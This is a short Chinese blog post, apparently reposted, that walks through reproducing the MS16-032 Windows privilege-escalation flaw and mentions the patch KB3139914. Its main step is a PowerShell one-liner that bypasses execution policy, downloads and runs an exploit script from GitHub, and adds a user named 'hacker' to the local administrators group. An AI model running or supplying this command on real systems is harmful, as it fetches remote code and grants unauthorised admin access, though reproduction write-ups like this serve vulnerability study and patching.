MS16-032 漏洞复现

exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

 

0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。MS16-032 漏洞复现_第1张图片

0x02直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

MS16-032 漏洞复现_第2张图片

0x03下面就是见证奇迹的时刻了

MS16-032 漏洞复现_第3张图片

 

该漏洞危害十分严重,如图在2008server上测试

MS16-032 漏洞复现_第4张图片

本地测试如图,被安全软件检测到。

MS16-032 漏洞复现_第5张图片

微软官方在2016年3月8日发布了补丁KB3139914。

 

附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051

转载于:https://www.cnblogs.com/NBeveryday/p/6196611.html

你可能感兴趣的:(MS16-032 漏洞复现)